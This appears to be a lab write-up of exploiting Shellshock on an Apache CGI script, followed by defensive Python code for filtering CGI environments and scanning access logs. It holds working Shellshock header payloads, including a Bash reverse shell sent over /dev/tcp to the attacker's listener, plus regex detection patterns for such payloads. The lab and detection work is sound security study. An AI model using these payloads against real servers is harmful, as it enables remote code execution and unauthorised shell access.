Overview
This was an INE lab focused on exploiting Shellshock, also known as CVE-2014-6271.
The target was running Apache with a CGI script. The goal was to find the CGI endpoint, confirm command execution, then use it to get a reverse shell.
The attack path was:
Apache -> CGI script -> Shellshock scan -> Burp command execution -> reverse shell -> daemon
Target
| Item | Value |
|---|---|
| Hostname | demo.ine.local |
| Target IP | 192.113.112.3 |
| Attacker IP | 192.113.112.2 |
| Main vulnerability | CVE-2014-6271 / Shellshock |
Enumeration
I started with a basic service version scan.
Nmap scan: nmap -sV 192.113.112.3
| Port | Service | Version |
|---|---|---|
| 80/tcp | HTTP | Apache httpd 2.4.6 |

Opening the website showed a basic under-construction page.

Finding the CGI Endpoint
I checked the page source and noticed that the page was calling this endpoint:
CGI endpoint: /gettime.cgi

This was the important part of the lab. A CGI gateway copies request headers into environment variables before running the script (User-Agent becomes HTTP_USER_AGENT), and a vulnerable Bash treats any variable whose value starts with "() {" as an exported function definition and executes whatever follows the closing brace. That is how an attacker-controlled header becomes a command.
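As an added illustration (not code from the lab or from the original writeup), the following Python models the mechanism: the header-to-variable mapping a CGI gateway performs, the prefix a vulnerable Bash looks for, and a pre-exec filter that drops such values before a script is launched. The filter is only a stop-gap of the kind a WAF rule provides; the real fix is a patched Bash. The function names and the sample request headers are constructed for this example.

```python
import re

# The Shellshock trigger: a value beginning with the Bash function-export
# marker "() {" (public payloads vary the whitespace between the tokens).
FUNCTION_EXPORT_PREFIX = re.compile(r"^\s*\(\)\s*\{")

# Constructed request headers, modelled on the lab's Burp Repeater request.
CONSTRUCTED_HEADERS = {
    "Host": "demo.ine.local",
    "User-Agent": "() { :; }; echo; /bin/bash -c 'id'",
    "Accept": "*/*",
}


def header_to_cgi_name(header: str) -> str:
    """Map an HTTP header name to its CGI meta-variable name (RFC 3875):
    upper-case, '-' replaced by '_', prefixed with HTTP_."""
    return "HTTP_" + header.strip().upper().replace("-", "_")


def cgi_environment(headers: dict) -> dict:
    """Build the environment block a CGI gateway hands to the script.
    Every request header becomes a variable, so the client controls the values;
    a vulnerable Bash then parses each value when the script starts."""
    return {header_to_cgi_name(name): value for name, value in headers.items()}


def is_shellshock_payload(value: str) -> bool:
    """True if the value would be parsed as a function definition by an
    unpatched Bash (the bug is in the import of functions from the environment)."""
    return FUNCTION_EXPORT_PREFIX.match(value) is not None


def filtered_cgi_environment(headers: dict) -> tuple:
    """Build the CGI environment but drop any variable whose value carries the
    function-export prefix. Returns (environment, names_dropped) so the
    dropped headers can be logged as an attack indicator."""
    env = {}
    dropped = []
    for name, value in cgi_environment(headers).items():
        if is_shellshock_payload(value):
            dropped.append(name)
        else:
            env[name] = value
    return env, dropped


if __name__ == "__main__":
    env, dropped = filtered_cgi_environment(CONSTRUCTED_HEADERS)
    print("passed to script:", env)
    print("dropped as Shellshock payloads:", dropped)
```

The filter matches on the value, not on the header name: the lab used User-Agent because it is convenient, but any header the gateway exports (Referer, Cookie, custom headers) reaches Bash the same way, so a check keyed on User-Agent alone would be incomplete.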
Confirming Shellshock
I searched for the Nmap NSE script related to Shellshock.
Find NSE script: find / -type f -iname "*.nse" 2>/dev/null | grep -i "shellshock"
The script was located at:
Result: /usr/share/nmap/scripts/http-shellshock.nse
Then I scanned the CGI endpoint directly.
Shellshock NSE scan: nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.113.112.3
The scan confirmed that the endpoint was vulnerable.

Testing Command Execution
After confirming the vulnerability, I sent the request to Burp Repeater and modified the User-Agent header.
The first test was running id to confirm command execution.
| Part | Value |
|---|---|
| Header | User-Agent |
| Payload | () { :; }; echo; /bin/bash -c 'id' |
| Result | uid=1(daemon) gid=1(daemon) groups=1(daemon) |
This confirmed that the target was executing commands as the daemon user.

Getting a Reverse Shell
After confirming command execution, I started a Netcat listener.
Listener: nc -nvlp 1234
Then I replaced the User-Agent value with a Bash reverse shell payload.
Reverse shell payload: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.113.112.2/1234 0>&1'

The listener received a connection from the target.
I confirmed access with whoami, id, and ls.
| Check | Result |
|---|---|
| User | daemon |
| Web directory files | gettime.cgi, index.html, static |
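From the defender's side, both the id test and the reverse shell leave a clear trace in the web server's access log, because Apache's combined log format records the User-Agent and Referer headers. The following Python is an added example (not part of the lab or the writeup) that parses combined-format lines and flags requests carrying the Shellshock function-export prefix, noting when the trailing command is a callback shell and when the path is a CGI endpoint. The log lines are constructed for this example, with the payloads copied from the lab above and an invented timestamp.

```python
import re
from dataclasses import dataclass, field

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Shellshock trigger: a header value that starts with the Bash
# function-export marker "() {"; what follows the closing brace is executed.
FUNCTION_EXPORT = re.compile(r"^\s*\(\)\s*\{")
# Indicators that the trailing command is a callback shell, as in the lab.
SHELL_CALLBACK = re.compile(r"/dev/tcp/|bash -i")
# Paths that are handed to a CGI handler on a typical Apache setup.
CGI_PATH = re.compile(r"\.cgi$|/cgi-bin/", re.IGNORECASE)

# Constructed sample log, modelled on the lab's requests (timestamp invented).
SAMPLE_LOG = [
    '192.113.112.2 - - [10/Mar/2024:12:00:01 +0000] "GET /gettime.cgi HTTP/1.1" 200 312 "-" '
    '"() { :; }; echo; /bin/bash -c \'id\'"',
    '192.113.112.2 - - [10/Mar/2024:12:00:05 +0000] "GET /gettime.cgi HTTP/1.1" 200 0 "-" '
    '"() { :; }; echo; /bin/bash -c \'bash -i >& /dev/tcp/192.113.112.2/1234 0>&1\'"',
    '192.113.112.2 - - [10/Mar/2024:12:00:09 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
]


@dataclass
class Finding:
    src: str
    path: str
    reasons: list = field(default_factory=list)


def analyse_line(line: str):
    """Return a Finding for a Shellshock-style request, or None for a clean line
    (or one that is not in combined format)."""
    m = COMBINED.match(line.rstrip("\n"))
    if m is None:
        return None
    reasons = []
    # Only these two headers are in the default log; other headers are not logged.
    for header, value in (("User-Agent", m["ua"]), ("Referer", m["referer"])):
        if FUNCTION_EXPORT.search(value):
            reasons.append(f"function-export prefix in {header}")
            if SHELL_CALLBACK.search(value):
                reasons.append(f"reverse-shell command in {header}")
    if reasons and CGI_PATH.search(m["path"]):
        reasons.append("request targets a CGI endpoint")
    return Finding(m["src"], m["path"], reasons) if reasons else None


def scan_log(lines):
    """Run analyse_line over an iterable of log lines and keep the findings."""
    return [f for f in map(analyse_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding.src, finding.path, "; ".join(finding.reasons))
```

The caveat that matters in practice: the access log only captures User-Agent and Referer, so a payload placed in Cookie or a custom header would not appear here. Full coverage needs either an extended LogFormat that records the headers of interest or inspection at a WAF or IDS, and the scan hits from the NSE script in the lab would also show up as the same prefix in the log.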

What I Learned
This lab was useful because it showed how Shellshock can be exploited through HTTP headers when a vulnerable CGI script is present.
The key part was finding /gettime.cgi. Without that endpoint, the Shellshock scan and Burp payload would not have had the right target path.
The main lesson is that old CGI functionality should be checked carefully during web enumeration, especially when Apache is running on a Unix-based system.